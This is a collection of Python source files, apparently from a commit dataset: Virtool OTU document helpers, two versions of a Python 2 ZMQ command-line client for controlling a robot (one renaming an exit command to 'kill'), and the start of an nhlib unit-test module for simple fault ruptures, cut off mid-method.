    Returns ``None`` when no isolate is flagged as default.

    :param joined: the joined otu document.
    :type joined: dict
    :return: a list of sequences associated with the default isolate.
    :rtype: list
    """
    return next(
        (isolate["sequences"] for isolate in joined["isolates"] if isolate["default"]),
        None
    )
def extract_isolate_ids(otu):
    """
    Get the isolate ids from a otu document.

    :param otu: a otu document.
    :return: a list of isolate ids.
    """
    ids = []

    for isolate in otu["isolates"]:
        ids.append(isolate["id"])

    return ids
def extract_sequence_ids(otu):
    """
    Extract all sequence ids from a merged otu.

    :param otu: the merged otu
    :type otu: dict
    :return: the sequence ids belonging to ``otu``
    :rtype: list
    :raises ValueError: if the isolate list or any sequence list is empty.
    :raises KeyError: if an isolate is missing its ``sequences`` field.
    """
    isolates = otu["isolates"]

    if not isolates:
        raise ValueError("Empty isolates list in merged otu")

    sequence_ids = []

    for isolate in isolates:
        try:
            sequences = isolate["sequences"]
        except KeyError:
            raise KeyError("Isolate in merged otu missing sequences field")

        if not sequences:
            raise ValueError("Empty sequences list in merged otu")

        sequence_ids.extend(sequence["_id"] for sequence in sequences)

    return sequence_ids
def find_isolate(isolates, isolate_id):
    """
    Return the isolate identified by ``isolate_id`` from a list of isolates.

    :param isolates: a list of isolate dicts
    :type isolates: list
    :param isolate_id: the isolate_id of the isolate to return
    :type isolate_id: str
    :return: an isolate, or ``None`` when no id matches
    :rtype: dict
    """
    for isolate in isolates:
        if isolate["id"] == isolate_id:
            return isolate

    return None
def format_otu(joined, issues=False, most_recent_change=None):
    """
    Format a joined otu document so it can be returned directly to API clients.

    :param joined: the joined otu document
    :type joined: Union[dict, NoneType]
    :param issues: an object describing issues in the otu; ``False`` triggers
        a fresh verification
    :type issues: Union[dict, NoneType, bool]
    :param most_recent_change: a change document for the most recent change made to OTU
    :type most_recent_change: dict
    :return: a joined and formatted otu
    :rtype: dict
    """
    formatted = virtool.utils.base_processor(joined)

    del formatted["lower_name"]

    # Strip internal fields from each sequence and expose "_id" as "id".
    for isolate in formatted["isolates"]:
        for sequence in isolate["sequences"]:
            sequence["id"] = sequence.pop("_id")
            del sequence["otu_id"]
            del sequence["isolate_id"]

    if most_recent_change:
        formatted["most_recent_change"] = virtool.utils.base_processor(most_recent_change)
    else:
        formatted["most_recent_change"] = None

    formatted["issues"] = verify(joined) if issues is False else issues

    return formatted
def format_isolate_name(isolate):
    """
    Build a readable display name for an isolate.

    :param isolate: a complete or partial isolate ``dict`` containing ``source_type`` and ``source_name`` fields.
    :type isolate: dict
    :return: an isolate name, or ``"Unnamed Isolate"`` when either the source
        type or source name is missing/empty
    :rtype: str
    """
    source_type = isolate["source_type"]
    source_name = isolate["source_name"]

    if source_type and source_name:
        return " ".join((source_type.capitalize(), source_name))

    return "Unnamed Isolate"
def merge_otu(otu, sequences):
    """
    Attach the given sequence documents to a copy of the given otu document.

    Each isolate in the returned otu gains a ``sequences`` field containing
    the sequence documents whose ``isolate_id`` matches that isolate. The
    input ``otu`` is not mutated.

    :param otu: a otu document.
    :type otu: dict
    :param sequences: the sequence documents to merge into the otu.
    :type sequences: list
    :return: the merged otu.
    :rtype: dict
    """
    # Group sequences by their isolate id up front so each isolate lookup
    # is constant time.
    grouped = dict()

    for sequence in sequences:
        grouped.setdefault(sequence["isolate_id"], []).append(sequence)

    merged = deepcopy(otu)

    for isolate in merged["isolates"]:
        # Copy the group so isolates never share a list object.
        isolate["sequences"] = list(grouped.get(isolate["id"], []))

    return merged
def split(merged):
    """
    Split a merged otu into a plain otu document and its sequence documents.

    The returned otu is a deep copy of ``merged`` with every isolate's
    ``sequences`` field removed; those sequence documents are collected into
    the returned list. The input is not mutated.

    :param merged: the merged otu to split
    :type merged: dict
    :return: a tuple containing the new otu document and a list of sequence documents
    :type: tuple
    """
    otu = deepcopy(merged)

    sequences = []

    for isolate in otu["isolates"]:
        sequences.extend(isolate.pop("sequences"))

    return otu, sequences
def verify(joined):
    """
    Check that the passed joined otu constitutes a valid Virtool record that
    can be included in a otu index. Error fields are:

    * empty_otu - otu has no isolates associated with it.
    * empty_isolate - isolates that have no sequences associated with them.
    * empty_sequence - sequences that have a zero length sequence field.
    * isolate_inconsistency - otu has isolates containing different numbers of sequences.

    :param joined: a joined otu
    :type joined: dict
    :return: a dict of errors if any were found, otherwise ``None``
    :rtype: Union[dict, None]
    """
    isolates = joined["isolates"]

    errors = {
        "empty_otu": len(isolates) == 0,
        "empty_isolate": [],
        "empty_sequence": [],
        "isolate_inconsistency": False
    }

    sequence_counts = []

    for isolate in isolates:
        sequences = isolate["sequences"]
        count = len(sequences)

        # Isolates with no sequences at all get an empty_isolate error.
        if count == 0:
            errors["empty_isolate"].append(isolate["id"])

        sequence_counts.append(count)

        # Sequences whose sequence string is empty get an empty_sequence error.
        errors["empty_sequence"].extend(
            sequence for sequence in sequences if len(sequence["sequence"]) == 0
        )

    # Flag inconsistent sequence counts across isolates, but only when the
    # otu is not already empty and no isolate is empty.
    errors["isolate_inconsistency"] = (
        len(set(sequence_counts)) != 1
        and not (errors["empty_otu"] or errors["empty_isolate"])
    )

    if any(errors.values()):
        # Normalize every falsy field (e.g. empty lists) to False before
        # returning, matching the documented error-object shape.
        for key, value in errors.items():
            if not value:
                errors[key] = False

        return errors

    return None
|
Correct the test URL that was raising a connection error
|
#!/usr/bin/env python
"""Send commands to the bot through a CLI interface."""
import cmd
import sys
import os
# Prepend the repository root to sys.path so the `client` package below can
# be imported when this script is run from inside the repo. These paths will
# need to be changed if this is running outside of the repo.
new_path = [os.path.join(os.path.abspath(os.path.dirname(__file__)), "..")]
sys.path = new_path + sys.path
import client.ctrl_client as ctrl_client_mod
import client.sub_client as sub_client_mod
class CLI(cmd.Cmd):
    """CLI for interacting with the bot.
    Note that the architecture is that interfaces, like the Command
    Line *Interface*, are used by agents like humans to interact
    with the bot. For interfaces to communicate with the bot, they
    own clients (like CtrlClient and SubClient), which know how to
    speak ZMQ to the servers (like CtrlServer and PubServer) running on
    the bot. Servers own systems (like gunner and driver) and known how
    to fire commands off to those systems and/or share data about their
    state.
    """
    # NOTE(review): this module is Python 2 (print statements and
    # `except Exception, e` syntax); it will not run under Python 3.
    # Prompt string shown by cmd.Cmd before each input line.
    prompt = "bot$ "
    def __init__(self, ctrl_addr, sub_addr):
        """Build CtrlClient and SubClient, for connections to servers.
        We're not using a logger or config here to reduce dependencies.
        CtrlClient is used for sending commands to the bot. Some commands,
        like `ping`, are answered by CtrlClient directly. Others, like
        `fire`, are actually exported methods that CtrlClient exposes
        via the API. Those calls are passed to the relevant method of a
        system owned by CtrlClient.
        SubClient manages subscriptions to topics published by PubServer
        on the bot. Topics can be subscribed to via `sub_add` and removed
        via `sub_del`. To print the data being published, use `sub`.
        Only topics that are actually subscribed to by one or more clients
        will be published by PubServer, saving bot resources. Note that
        PubServer isn't spawned by default when CtrlServer is created.
        To spawn it (in its own thread), issue `ctrl spawn_pub_server`.
        :param ctrl_addr: Address of control server to connect to via ZMQ.
        :type ctrl_addr: string
        :param sub_addr: Address of PUB/SUB server to connect to via ZMQ.
        :type sub_addr: string
        """
        # Call superclass __init__
        cmd.Cmd.__init__(self)
        # Build control client
        try:
            self.ctrl_client = ctrl_client_mod.CtrlClient(ctrl_addr)
        except Exception, e:
            # Without a control connection the CLI is useless; bail out.
            print "Couldn't build CtrlClient addr:{} e:{}".format(ctrl_addr, e)
            sys.exit(-1)
        # Build sub client
        try:
            self.sub_client = sub_client_mod.SubClient(sub_addr)
        except Exception, e:
            print "SubClient error sub_addr:{}, error:{}".format(sub_addr, e)
            sys.exit(-1)
    def default(self, raw_args):
        """Parses API commands (ex `ctrl echo msg:7`) into calls to CtrlServer.
        API commands are those given by the `list` command. Note that a
        heuristic is used to convert params (like "7" in the example above)
        into the types expected by the method that will be called and passed
        that param by CtrlServer. It has held up well so far.
        :param raw_args: Command from user to be parsed/passed to CtrlServer.
        :type raw_args: string
        """
        obj_name, _, rest = raw_args.partition(" ")
        if obj_name in self.ctrl_client.objects:
            method_name, _, params = rest.partition(" ")
            if method_name in self.ctrl_client.objects[obj_name]:
                try:
                    param_dict = {}
                    # Split param into its key:value strs and iterate on them
                    for param in params.split():
                        # Split key:value param pair
                        key, value = param.split(":")
                        # We need to convert param's value, which was given to
                        # this method as a string in raw_args, to the type
                        # expected by the method it will be passed to.
                        # This is a dirty heuristic (that so far works well)!
                        # Try converting to int/float - easy to know if wrong
                        try:
                            if "." in value:
                                value = float(value)
                            else:
                                value = int(value)
                        except ValueError:
                            # It wasn't an int or float, assume string
                            # If user gave key:'value', strip '' chars
                            if value.startswith("'") and value.endswith("'"):
                                value = value[1:-1]
                            # It's already type string, no need to cast
                        param_dict[key] = value
                except IndexError:
                    print "Bad parameter list"
                    return
                except ValueError:
                    print "Bad parameter value"
                    return
                # Dispatch the parsed call to the server via the control client.
                result = self.ctrl_client.call(obj_name, method_name, param_dict)
                print "-->", result
            else:
                print "Unknown API method:", method_name
        else:
            print "Unknown command:", obj_name
    def completenames(self, text, *ignored):
        """Handles tab-completion of object names exported by the API.
        Object names, like those returned by `list` (driver, gun...),
        aren't known to Cmd.completenames. We extend it here to deal
        with tab-completing them.
        :param text: Text the user has type so far, to be tab-completed.
        :type text: string
        :param *ignored: Not documented in Cmd.completenames. No idea.
        :type *ignored: Not documented in Cmd.completenames. Dict?
        """
        # NB: We can't use super() here since Cmd is an old-style class
        # Gets list of do_* methods that match what the user has typed so far
        cmd_match_names = cmd.Cmd.completenames(self, text, *ignored)
        # Need to do the same thing for exported API methods
        # Names of objects exported by API (like driver, gunner...)
        obj_names = self.ctrl_client.objects.keys()
        # Build list of obj_names that start with text given by user
        api_match_names = [x for x in obj_names if x.startswith(text)]
        return cmd_match_names + api_match_names
    def completedefault(self, text, line, begidx, endidx):
        """Handles tab-completion of method names exported by API.
        The matching of the first term (the object name exported by the API)
        is done separately, using the results of copmletenames().
        :param text: Part of method name (second arg) typed so far by user.
        :type text: string
        :param line: Entire line typed so far by user.
        :type line: string
        :param begidx: Index into "line" where "text" begins.
        :type begidx: int
        :param endidx: Index into "line" where "text" ends.
        :type endidx: int
        :returns: List of exported API methods that match text given by user.
        """
        obj, _, rest = line.partition(" ")
        if obj in self.ctrl_client.objects:
            # If the user tries to tab-complete once they have typed
            # `obj method par..`, "par.." being the start of a param, this
            # line will grab the method name only, dropping the param. We
            # can't tab-complete params at the moment (but that would be nice).
            method, _, params = rest.strip().partition(" ")
            # Only does this if user is tab-completing method, not params
            if method == text:  # FIXME: Should actually verify index position
                method_names = self.ctrl_client.objects[obj]
                match_names = [x for x in method_names if x.startswith(text)]
                return match_names
        # Implicitly returns None (no matches) for unknown objects.
    def do_list(self, raw_args):
        """Provide a list of bot API objects and their methods.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        print
        print "Available bot objects and methods"
        print
        for obj_name, methods in sorted(self.ctrl_client.objects.items()):
            print "{}:".format(obj_name)
            for method in methods:
                print " - {}".format(method)
        print
    def help_list(self):
        """Provide help message for list command."""
        print "list"
        print "\tList on-bot objects and methods exposed by the API."
    def do_ping(self, raw_args):
        """Ping the control server on the bot.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        reply_time = self.ctrl_client.ping()
        print "CtrlServer response time: {}ms".format(reply_time)
    def help_ping(self):
        """Provide help message for ping command."""
        print "ping"
        print "\tPing the control server on the bot."
    def do_sub_add(self, raw_args):
        """Subscribe to a published topic.
        Note that with ZMQ (libzmq) versions >= 3.0, topics that are not
        subscribed to by any client are not published (done automatically
        at the server).
        :param raw_args: Commands string with topic name to add.
        :type raw_args: string
        """
        # Get and validate arguments
        try:
            topic = raw_args.split()[0]
        except (ValueError, IndexError):
            print "Invalid command, see help [cmd]."
            return
        self.sub_client.add_topic(topic)
    def help_sub_add(self):
        """Provide help message for sub_add command."""
        print "sub_add <topic>"
        print "\tSubscribe to a published topic."
    def do_sub_del(self, raw_args):
        """Unsubscribe from a published topic.
        Note that with ZMQ (libzmq) versions >= 3.0, topics that are not
        subscribed to by any client are not published (done automatically
        at the server).
        :param raw_args: Commands string with topic name to unsubscribe from.
        :type raw_args: string
        """
        # Get and validate arguments
        try:
            topic = raw_args.split()[0]
        except (ValueError, IndexError):
            print "Invalid command, see help [cmd]."
            return
        self.sub_client.del_topic(topic)
    def help_sub_del(self):
        """Provide help message for sub_del command."""
        print "sub_del <topic>"
        print "\tUnsubscribe from a published topic."
    def do_sub(self, raw_args):
        """Print topics subscribed to via SubClient.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        self.sub_client.print_msgs()
    def help_sub(self):
        """Provide help message for sub command."""
        print "sub"
        print "\tPrint messages subscribed to. Ctrl+c to exit."
    def do_exit_ctrl(self, raw_args):
        """Send message to CtrlServer, asking it to exit.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        self.ctrl_client.exit_server()
    def help_exit_ctrl(self):
        """Provide help message for exit_ctrl command."""
        print "exit_ctrl"
        print "\tAsk the CtrlServer to exit."
    def do_die(self, raw_args):
        """Disconnect from servers and close CLI.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        print "Disconnecting..."
        self.ctrl_client.clean_up()
        self.sub_client.clean_up()
        print "Bye!"
        # Returning True tells cmd.Cmd.cmdloop to stop.
        return True
    def help_die(self):
        """Provide help message for die command."""
        print "die"
        print "\tDisconnect from servers and close CLI."
    def do_shell(self, cmd):
        """Allows normal shell commands to be run.
        :param cmd: Everything after "shell" or "!", to be passed to shell.
        :type cmd: string
        """
        # NOTE(review): passes user input straight to the system shell;
        # acceptable for a local operator CLI, but never expose remotely.
        os.system(cmd)
    def help_shell(self):
        """Provide help message for shell command."""
        print "!|shell [command]"
        print "\tSend command to underlying system shell (like Bash)."
    def do_EOF(self, raw_args):
        """Cleans up when ctrl+d is used to exit client.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        print "Disconnecting..."
        self.ctrl_client.clean_up()
        self.sub_client.clean_up()
        print "Bye!"
        return True
    def help_EOF(self):
        """Provide help message for EOF (ctrl+d) command."""
        print "ctrl+d"
        print "\tDisconnect from servers and close CLI with ctrl+d."
    def help_help(self):
        """Provide help message for help command."""
        print "help [command]"
        print "\tProvide help on given command. If no argument, list commands."
if __name__ == '__main__':
    # With no arguments, fall back to the default local server addresses
    # (ctrl on port 60000, pub/sub on port 60001).
    if len(sys.argv) == 1:
        print "No ctrl_addr or sub_addr given, using tcp://localhost:60000,1"
        CLI("tcp://localhost:60000", "tcp://localhost:60001").cmdloop()
    elif len(sys.argv) == 3:
        # Using given ctr_addr and sub_addr
        ctrl_addr = sys.argv[1]
        sub_addr = sys.argv[2]
        CLI(ctrl_addr, sub_addr).cmdloop()
    else:
        print "Error: Expected `./cli.py [ctrl_addr sub_addr]`"
Converted the `exit_ctrl` command to `kill`
#!/usr/bin/env python
"""Send commands to the bot through a CLI interface."""
import cmd
import sys
import os
# Prepend the repository root to sys.path so the `client` package below can
# be imported when this script is run from inside the repo. These paths will
# need to be changed if this is running outside of the repo.
new_path = [os.path.join(os.path.abspath(os.path.dirname(__file__)), "..")]
sys.path = new_path + sys.path
import client.ctrl_client as ctrl_client_mod
import client.sub_client as sub_client_mod
class CLI(cmd.Cmd):
    """CLI for interacting with the bot.
    Note that the architecture is that interfaces, like the Command
    Line *Interface*, are used by agents like humans to interact
    with the bot. For interfaces to communicate with the bot, they
    own clients (like CtrlClient and SubClient), which know how to
    speak ZMQ to the servers (like CtrlServer and PubServer) running on
    the bot. Servers own systems (like gunner and driver) and known how
    to fire commands off to those systems and/or share data about their
    state.
    """
    # NOTE(review): this module is Python 2 (print statements and
    # `except Exception, e` syntax); it will not run under Python 3.
    # Prompt string shown by cmd.Cmd before each input line.
    prompt = "bot$ "
    def __init__(self, ctrl_addr, sub_addr):
        """Build CtrlClient and SubClient, for connections to servers.
        We're not using a logger or config here to reduce dependencies.
        CtrlClient is used for sending commands to the bot. Some commands,
        like `ping`, are answered by CtrlClient directly. Others, like
        `fire`, are actually exported methods that CtrlClient exposes
        via the API. Those calls are passed to the relevant method of a
        system owned by CtrlClient.
        SubClient manages subscriptions to topics published by PubServer
        on the bot. Topics can be subscribed to via `sub_add` and removed
        via `sub_del`. To print the data being published, use `sub`.
        Only topics that are actually subscribed to by one or more clients
        will be published by PubServer, saving bot resources. Note that
        PubServer isn't spawned by default when CtrlServer is created.
        To spawn it (in its own thread), issue `ctrl spawn_pub_server`.
        :param ctrl_addr: Address of control server to connect to via ZMQ.
        :type ctrl_addr: string
        :param sub_addr: Address of PUB/SUB server to connect to via ZMQ.
        :type sub_addr: string
        """
        # Call superclass __init__
        cmd.Cmd.__init__(self)
        # Build control client
        try:
            self.ctrl_client = ctrl_client_mod.CtrlClient(ctrl_addr)
        except Exception, e:
            # Without a control connection the CLI is useless; bail out.
            print "Couldn't build CtrlClient addr:{} e:{}".format(ctrl_addr, e)
            sys.exit(-1)
        # Build sub client
        try:
            self.sub_client = sub_client_mod.SubClient(sub_addr)
        except Exception, e:
            print "SubClient error sub_addr:{}, error:{}".format(sub_addr, e)
            sys.exit(-1)
    def default(self, raw_args):
        """Parses API commands (ex `ctrl echo msg:7`) into calls to CtrlServer.
        API commands are those given by the `list` command. Note that a
        heuristic is used to convert params (like "7" in the example above)
        into the types expected by the method that will be called and passed
        that param by CtrlServer. It has held up well so far.
        :param raw_args: Command from user to be parsed/passed to CtrlServer.
        :type raw_args: string
        """
        obj_name, _, rest = raw_args.partition(" ")
        if obj_name in self.ctrl_client.objects:
            method_name, _, params = rest.partition(" ")
            if method_name in self.ctrl_client.objects[obj_name]:
                try:
                    param_dict = {}
                    # Split param into its key:value strs and iterate on them
                    for param in params.split():
                        # Split key:value param pair
                        key, value = param.split(":")
                        # We need to convert param's value, which was given to
                        # this method as a string in raw_args, to the type
                        # expected by the method it will be passed to.
                        # This is a dirty heuristic (that so far works well)!
                        # Try converting to int/float - easy to know if wrong
                        try:
                            if "." in value:
                                value = float(value)
                            else:
                                value = int(value)
                        except ValueError:
                            # It wasn't an int or float, assume string
                            # If user gave key:'value', strip '' chars
                            if value.startswith("'") and value.endswith("'"):
                                value = value[1:-1]
                            # It's already type string, no need to cast
                        param_dict[key] = value
                except IndexError:
                    print "Bad parameter list"
                    return
                except ValueError:
                    print "Bad parameter value"
                    return
                # Dispatch the parsed call to the server via the control client.
                result = self.ctrl_client.call(obj_name, method_name, param_dict)
                print "-->", result
            else:
                print "Unknown API method:", method_name
        else:
            print "Unknown command:", obj_name
    def completenames(self, text, *ignored):
        """Handles tab-completion of object names exported by the API.
        Object names, like those returned by `list` (driver, gun...),
        aren't known to Cmd.completenames. We extend it here to deal
        with tab-completing them.
        :param text: Text the user has type so far, to be tab-completed.
        :type text: string
        :param *ignored: Not documented in Cmd.completenames. No idea.
        :type *ignored: Not documented in Cmd.completenames. Dict?
        """
        # NB: We can't use super() here since Cmd is an old-style class
        # Gets list of do_* methods that match what the user has typed so far
        cmd_match_names = cmd.Cmd.completenames(self, text, *ignored)
        # Need to do the same thing for exported API methods
        # Names of objects exported by API (like driver, gunner...)
        obj_names = self.ctrl_client.objects.keys()
        # Build list of obj_names that start with text given by user
        api_match_names = [x for x in obj_names if x.startswith(text)]
        return cmd_match_names + api_match_names
    def completedefault(self, text, line, begidx, endidx):
        """Handles tab-completion of method names exported by API.
        The matching of the first term (the object name exported by the API)
        is done separately, using the results of copmletenames().
        :param text: Part of method name (second arg) typed so far by user.
        :type text: string
        :param line: Entire line typed so far by user.
        :type line: string
        :param begidx: Index into "line" where "text" begins.
        :type begidx: int
        :param endidx: Index into "line" where "text" ends.
        :type endidx: int
        :returns: List of exported API methods that match text given by user.
        """
        obj, _, rest = line.partition(" ")
        if obj in self.ctrl_client.objects:
            # If the user tries to tab-complete once they have typed
            # `obj method par..`, "par.." being the start of a param, this
            # line will grab the method name only, dropping the param. We
            # can't tab-complete params at the moment (but that would be nice).
            method, _, params = rest.strip().partition(" ")
            # Only does this if user is tab-completing method, not params
            if method == text:  # FIXME: Should actually verify index position
                method_names = self.ctrl_client.objects[obj]
                match_names = [x for x in method_names if x.startswith(text)]
                return match_names
        # Implicitly returns None (no matches) for unknown objects.
    def do_list(self, raw_args):
        """Provide a list of bot API objects and their methods.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        print
        print "Available bot objects and methods"
        print
        for obj_name, methods in sorted(self.ctrl_client.objects.items()):
            print "{}:".format(obj_name)
            for method in methods:
                print " - {}".format(method)
        print
    def help_list(self):
        """Provide help message for list command."""
        print "list"
        print "\tList on-bot objects and methods exposed by the API."
    def do_ping(self, raw_args):
        """Ping the control server on the bot.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        reply_time = self.ctrl_client.ping()
        print "CtrlServer response time: {}ms".format(reply_time)
    def help_ping(self):
        """Provide help message for ping command."""
        print "ping"
        print "\tPing the control server on the bot."
    def do_sub_add(self, raw_args):
        """Subscribe to a published topic.
        Note that with ZMQ (libzmq) versions >= 3.0, topics that are not
        subscribed to by any client are not published (done automatically
        at the server).
        :param raw_args: Commands string with topic name to add.
        :type raw_args: string
        """
        # Get and validate arguments
        try:
            topic = raw_args.split()[0]
        except (ValueError, IndexError):
            print "Invalid command, see help [cmd]."
            return
        self.sub_client.add_topic(topic)
    def help_sub_add(self):
        """Provide help message for sub_add command."""
        print "sub_add <topic>"
        print "\tSubscribe to a published topic."
    def do_sub_del(self, raw_args):
        """Unsubscribe from a published topic.
        Note that with ZMQ (libzmq) versions >= 3.0, topics that are not
        subscribed to by any client are not published (done automatically
        at the server).
        :param raw_args: Commands string with topic name to unsubscribe from.
        :type raw_args: string
        """
        # Get and validate arguments
        try:
            topic = raw_args.split()[0]
        except (ValueError, IndexError):
            print "Invalid command, see help [cmd]."
            return
        self.sub_client.del_topic(topic)
    def help_sub_del(self):
        """Provide help message for sub_del command."""
        print "sub_del <topic>"
        print "\tUnsubscribe from a published topic."
    def do_sub(self, raw_args):
        """Print topics subscribed to via SubClient.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        self.sub_client.print_msgs()
    def help_sub(self):
        """Provide help message for sub command."""
        print "sub"
        print "\tPrint messages subscribed to. Ctrl+c to exit."
    def do_kill(self, raw_args):
        """Send message to CtrlServer, asking it to exit.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        self.ctrl_client.exit_server()
    def help_kill(self):
        """Provide help message for kill command."""
        print "kill"
        print "\tAsk the CtrlServer to exit."
    def do_die(self, raw_args):
        """Disconnect from servers and close CLI.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        print "Disconnecting..."
        self.ctrl_client.clean_up()
        self.sub_client.clean_up()
        print "Bye!"
        # Returning True tells cmd.Cmd.cmdloop to stop.
        return True
    def help_die(self):
        """Provide help message for die command."""
        print "die"
        print "\tDisconnect from servers and close CLI."
    def do_shell(self, cmd):
        """Allows normal shell commands to be run.
        :param cmd: Everything after "shell" or "!", to be passed to shell.
        :type cmd: string
        """
        # NOTE(review): passes user input straight to the system shell;
        # acceptable for a local operator CLI, but never expose remotely.
        os.system(cmd)
    def help_shell(self):
        """Provide help message for shell command."""
        print "!|shell [command]"
        print "\tSend command to underlying system shell (like Bash)."
    def do_EOF(self, raw_args):
        """Cleans up when ctrl+d is used to exit client.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        print "Disconnecting..."
        self.ctrl_client.clean_up()
        self.sub_client.clean_up()
        print "Bye!"
        return True
    def help_EOF(self):
        """Provide help message for EOF (ctrl+d) command."""
        print "ctrl+d"
        print "\tDisconnect from servers and close CLI with ctrl+d."
    def help_help(self):
        """Provide help message for help command."""
        print "help [command]"
        print "\tProvide help on given command. If no argument, list commands."
if __name__ == '__main__':
    # With no arguments, fall back to the default local server addresses
    # (ctrl on port 60000, pub/sub on port 60001).
    if len(sys.argv) == 1:
        print "No ctrl_addr or sub_addr given, using tcp://localhost:60000,1"
        CLI("tcp://localhost:60000", "tcp://localhost:60001").cmdloop()
    elif len(sys.argv) == 3:
        # Using given ctr_addr and sub_addr
        ctrl_addr = sys.argv[1]
        sub_addr = sys.argv[2]
        CLI(ctrl_addr, sub_addr).cmdloop()
    else:
        print "Error: Expected `./cli.py [ctrl_addr sub_addr]`"
|
# nhlib: A New Hazard Library
# Copyright (C) 2012 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import numpy
from nhlib.const import TRT
from nhlib.source.simple_fault import SimpleFaultSource
from nhlib.source.rupture import ProbabilisticRupture
from nhlib.mfd import TruncatedGRMFD
from nhlib.scalerel.peer import PeerMSR
from nhlib.geo import Point, Line, Polygon
from nhlib.tom import PoissonTOM
from tests import assert_angles_equal
from tests.geo.surface._utils import assert_mesh_is
from tests.source import _simple_fault_test_data as test_data
class _BaseFaultSourceTestCase(unittest.TestCase):
    """Shared fixture/assertion helpers for SimpleFaultSource tests."""
    # Tectonic region type and rake used for every source built by these tests.
    TRT = TRT.ACTIVE_SHALLOW_CRUST
    RAKE = 0
    def _make_source(self, mfd, aspect_ratio, fault_trace=None, dip=45):
        """Build a SimpleFaultSource with fixed test geometry.

        :param mfd: magnitude-frequency distribution for the source.
        :param aspect_ratio: rupture aspect ratio to use.
        :param fault_trace: optional fault trace; when omitted a short
            default trace is used.
        :param dip: fault dip in degrees (default 45).
        :returns: a configured ``SimpleFaultSource``.
        """
        source_id = name = 'test-source'
        trt = self.TRT
        rake = self.RAKE
        rupture_mesh_spacing = 1
        upper_seismogenic_depth = 0
        # NOTE(review): presumably chosen as 3 * sqrt(2) so a 45-degree dip
        # gives a round fault width -- confirm against the test data.
        lower_seismogenic_depth = 4.2426406871192848
        magnitude_scaling_relationship = PeerMSR()
        rupture_aspect_ratio = aspect_ratio
        if fault_trace is None:
            fault_trace = Line([Point(0.0, 0.0),
                                Point(0.0, 0.0359728811758),
                                Point(0.0190775080917, 0.0550503815181),
                                Point(0.03974514139, 0.0723925718855)])
        return SimpleFaultSource(
            source_id, name, trt, mfd, rupture_mesh_spacing,
            magnitude_scaling_relationship, rupture_aspect_ratio,
            upper_seismogenic_depth, lower_seismogenic_depth,
            fault_trace, dip, rake
        )
    def _test_ruptures(self, expected_ruptures, source):
        """Assert ``source.iter_ruptures`` yields exactly ``expected_ruptures``.

        Checks type, temporal model, TRT and rake on every rupture, then
        compares magnitude, rake, occurrence rate, surface mesh, hypocenter,
        strike and dip against each expected record in order.
        """
        tom = PoissonTOM(time_span=50)
        ruptures = list(source.iter_ruptures(tom))
        for rupture in ruptures:
            self.assertIsInstance(rupture, ProbabilisticRupture)
            self.assertIs(rupture.temporal_occurrence_model, tom)
            self.assertIs(rupture.tectonic_region_type, self.TRT)
            self.assertEqual(rupture.rake, self.RAKE)
        self.assertEqual(len(expected_ruptures), len(ruptures))
        # NB: xrange -- this file is Python 2.
        for i in xrange(len(expected_ruptures)):
            expected_rupture, rupture = expected_ruptures[i], ruptures[i]
            self.assertAlmostEqual(rupture.mag, expected_rupture['mag'])
            self.assertAlmostEqual(rupture.rake, expected_rupture['rake'])
            self.assertAlmostEqual(rupture.occurrence_rate,
                                   expected_rupture['occurrence_rate'])
            assert_mesh_is(self, rupture.surface,
                           expected_rupture['surface'])
            self.assertEqual(rupture.hypocenter,
                             Point(*expected_rupture['hypocenter']))
            # Angles are compared with tolerances (strike 0.5 deg, dip 3 deg).
            assert_angles_equal(self, rupture.surface.get_strike(),
                                expected_rupture['strike'], delta=0.5)
            assert_angles_equal(self, rupture.surface.get_dip(),
                                expected_rupture['dip'], delta=3)
class SimpleFaultIterRupturesTestCase(_BaseFaultSourceTestCase):
    """Compare iter_ruptures output against precomputed test-data fixtures."""
    def test_2(self):
        # rupture dimensions are larger then mesh_spacing, number of nodes
        # along strike and dip is even
        mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=3.0, max_mag=4.0,
                             bin_width=1.0)
        self._test_ruptures(test_data.TEST2_RUPTURES,
                            self._make_source(mfd=mfd, aspect_ratio=1.0))
    def test_3(self):
        # rupture length greater than fault length, number of nodes along
        # length is odd and along width is even
        mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=5.0, max_mag=6.0,
                             bin_width=1.0)
        self._test_ruptures(test_data.TEST3_RUPTURES,
                            self._make_source(mfd=mfd, aspect_ratio=4.0))
    def test_4(self):
        # rupture width greater than fault width, number of nodes along
        # length is even, along width is odd
        mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=5.4, max_mag=5.5,
                             bin_width=0.1)
        self._test_ruptures(test_data.TEST4_RUPTURES,
                            self._make_source(mfd=mfd, aspect_ratio=0.5))
    def test_5(self):
        # rupture length and width greater than fault length and width
        # respectively
        mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=6.0, max_mag=7.0,
                             bin_width=1.0)
        self._test_ruptures(test_data.TEST5_RUPTURES,
                            self._make_source(mfd=mfd, aspect_ratio=1.0))
class SimpleFaultParametersChecksTestCase(_BaseFaultSourceTestCase):
    """Check that invalid constructor parameters raise ValueError."""
    def test_mesh_spacing_too_small(self):
        # The smallest rupture (max_mag 1.5) would be finer than the 1 km
        # mesh spacing, so construction must fail.
